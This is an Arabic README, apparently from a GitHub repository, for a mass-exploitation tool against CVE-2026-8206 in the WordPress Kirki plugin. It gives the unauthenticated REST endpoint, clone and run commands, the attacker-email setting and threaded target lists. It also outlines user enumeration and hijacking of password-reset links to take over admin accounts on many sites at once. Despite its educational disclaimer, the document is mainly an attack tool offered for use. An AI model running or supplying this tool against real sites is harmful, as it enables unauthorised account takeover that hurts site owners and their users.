
أداة استغلال جماعي لـ CVE-2026-8206 – تصعيد امتيازات غير مصادق عليه عبر 'handle_forgot_password' في إضافة Kirlo لـ WordPress (الإصدارات ≤6.0.6).
أداة استغلال جماعي لـ CVE-2026-8206 – ثغرة حرجة في ملحق Kirki لووردبريس (الإصدارات ≤ 6.0.6) تسمح للمهاجمين غير المصادق عليهم باختطاف روابط إعادة تعيين كلمة المرور والاستيلاء على أي حساب مستخدم، بما في ذلك حسابات المسؤولين.
ملحق Kirki يعرض نقطة نهاية REST غير مصادق عليها (/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password). بسبب غياب فحوصات الصلاحيات والتحقق غير السليم من البريد الإلكتروني، يمكن للمهاجم:
الإصدارات المتأثرة: ≤ 6.0.6
الإصدار الذي تم إصلاحه: 6.0.7
readme.txt و kirki.min.css (يدعم مجلدي kirki و kirki-test)/wp-json/wp/v2/users (الاحتياط إلى admin)requestsconcurrent.futures (نسخة backport، مثبتة عادة)تثبيت التبعيات:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
عدّل السكربت لتعيين بريدك الإلكتروني كمهاجم:
ATTACKER_EMAIL = "[email protected]" # line ~15
python CVE-2026-8206.py <targets_file> [threads]
<targets_file> – ملف نصي يحتوي على نطاق واحد في كل سطر (مع أو بدون http:///https://)[threads] – اختياري، عدد الخيوط المتزامنة (الافتراضي: 15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – يحتوي على الأهداف التي تم استغلالها بنجاح بالتنسيق:
URL|username|attacker_email|reset_link_sent_to_attacker_email
مثال:
https://example.com|admin|[email protected]|reset_link_sent_to_attacker_email
مخرجات الكونسول تعرض تقدمًا في الوقت الفعلي:
/wp-content/plugins/{kirki,kirki-test}/readme.txt (Stable tag) و /.../kirki.min.css (معامل ver). إذا كان الإصدار ≤ 6.0.6، تابع./wp-json/wp/v2/users، وإذا كان فارغًا يتراجع إلى admin.username = اسم المستخدم المستهدفemail = بريد المهاجم الإلكترونيemailBody = JSON يتضمن شريحة reset_link200 و "Email sent"، يتم كتابة الهدف في res.txt.هذا البرنامج مقدّم لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها يعد غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
لمزيد من إخلاء المسؤولية، يمكنك الاطلاع على إخلاء المسؤولية على غلاف Jenderal92. يمكنك التحقق منه هنا !!!